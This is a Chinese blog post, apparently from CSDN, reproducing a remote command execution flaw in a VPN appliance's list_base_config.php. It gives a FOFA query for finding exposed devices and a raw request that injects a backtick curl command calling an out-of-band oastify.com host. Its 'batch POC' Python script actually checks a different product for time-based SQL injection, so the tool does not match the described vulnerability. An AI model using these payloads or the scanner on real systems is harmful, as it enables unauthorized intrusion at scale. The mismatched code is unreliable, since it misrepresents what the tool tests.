【漏洞复现】某某康达vpn/list_base_config.php 远程命令执行漏洞 RCE 带批量POC

最新推荐文章于 2024-09-27 10:11:28 发布
最新推荐文章于 2024-09-27 10:11:28 发布
阅读量429 收藏 4
点赞数 10
分类专栏: 漏洞复现 文章标签: 开发语言 python 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/141335098
版权


》》》漏洞描述《《《

       网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。防火墙则对网络流量进行监控和控制,保护网络安全。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。

》》》资产收集《《《

1)信息收集
fofa:body="/images/raisecom/back.gif"

》》》漏洞复现《《《

1.构造数据包

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

1.使用DNSLog.cn获取一个Domain

构造数据包,执行curl命令访问DNSLog生产的domain

3.DNSLog获取服务器的IP地址

》》》测试工具《《《

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re
 
# 禁用SSL证书验证,忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls
 
def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞,返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # 构造SQL注入数据包
    data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
        # 判断响应状态码、响应内容以及响应时间是否符合预期
        if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

A 八方
关注
专栏目录
用友U8 CRM reservationcomplete.php SQL注入致RCE漏洞复现
0xSec
07-26 1490
​用友U8CRM客户关系管理系统reservationcomplete.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
Ivanti Connect Secure VPN SSRF漏洞复现(CVE-2024-21893)
0xSec
02-06 1169
漏洞是由于Ivanti Connect Secure、Ivanti Policy Secure和 Ivanti Neurons for ZTA 的 SAML 组件中存在服务器端请求伪造漏洞,因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源,结合相关功能造成远程代码执行
漏洞复现】某某康达vpn——list_base_config.php——命令执行
LongL_GuYu的博客
08-16 670
声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
HW漏洞威胁情报第一天|HW情报
weixin_43167326的博客
07-24 419
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
漏洞复现】上海冰峰ICEFLOW VPN信息泄露漏洞
晚风不及你
01-26 654
上海冰峰计算机网络技术有限公司是国内VPN、流量管理、行为管理、链路负载均衡、下一代防火墙设备供应商和IT价值解决方案提供商。冰峰网络reporter系统是一套数据报表管理系统。
漏洞复现Web user login存在RCE漏洞
网安小白
08-16 424
Web user login存在RCE漏洞
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCEPOC
06-06
远程命令执行RCEPOC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
漏洞复现】飞企互联-FE企业运营管理平台-common_sort_tree-RCE
知黑而守白
01-10 357
飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。飞企互联-FE企业运营管理平台 common_sort_tree.jsp 接口权限设置不当,攻击者可以通过利用此漏洞执行系统命令,导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6816
正入万山圈子里,一山放过一山拦。
漏洞复现
热门推荐
内心不种满鲜花就会长满杂草
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞(CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
网站建设中常见的网站后台开发语言有哪几种,各自优缺点都是什么?
2301_80154636的博客
09-24 1386
总的来说,每种语言都有其特定的优势和局限,选择哪种语言取决于项目需求、团队技能和预期的维护成本等多种因素。理解这些语言的核心特性和适用场景可以帮助开发者做出更明智的选择,从而有效提升项目的成功率和开发效率。这些语言各有其独特的优缺点,适用于不同的开发场景和需求。市场上常见的网站后台开发语言有。
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 601
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
最新发布
2301_78772942的博客
09-27 518
第二百五十四节 JPA教程 - JPA 多对多映射示例
python 实现harmonic series调和级数算法
luthane的博客
09-24 959
Hn∑k1n1kHn​k1∑n​k1​其中,𝑛n 是正整数。这个级数是由调和数列(Harmonic sequence)的各元素相加所得的和。调和级数的名字源于泛音及泛音列,即一条振动的弦的泛音的波长依次是基本波长的12131421​31​41​等。调和级数的性质发散性:调和级数是一个发散的无穷级数,也就是说,它的部分和随着项数的增加而无限增长。
ubuntu安装libtorch
meng_152634的博客
09-25 703
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
深信服edr代码审计:远程命令执行漏洞分析(RCE
"深信服edr终端检测响应平台()存在代码审计挖掘出的远程命令执行RCE漏洞,允许攻击者执行任意系统命令。此漏洞影响版本低于3.2.21,通过搜索和分析敏感函数,如exec()等,发现 ldb_exec() 函数的自定义命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值